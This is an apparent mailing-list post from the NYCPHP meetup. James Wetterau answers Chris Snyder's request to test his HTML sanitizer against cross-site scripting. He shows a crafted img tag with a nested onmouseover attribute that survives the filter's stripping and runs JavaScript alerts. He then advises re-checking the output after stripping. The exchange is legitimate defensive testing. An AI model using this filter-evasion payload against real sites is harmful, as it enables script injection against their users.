NYCPHP Meetup

[James Wetterau]

Chris Snyder says:
> I've whipped up a pcom-to-be that will render user-submitted HTML safe 
> from all of the cross-site-scripting attacks that I'm aware of.
> If you think you know any clever tricks for getting javascript or nasty 
> tags (like <embed>) around text filters, could you please have a go at 
> breaking it?

This submission breaks it:

Strips some attibutes:<br>
<img src='http://fotola.com/berylium/csnyder/?method=latestimage'
onmouseover='whatever(whatever="onmouseover='
alert("gotcha");
alert("I can do anything in here"); 
'/>

Note, it also breaks your page, so the exploit will not be obvious
unless you verify that the attempted "safe" HTML doesn't work by
putting it on a page by itself.  

Your program needs to verify that after it strips the HTML it hasn't
generated unsafe HTML, and it needs a way to avoid getting caught in a
loop doing that.  This is the sort of programming challenge that I
like to model with a state machine.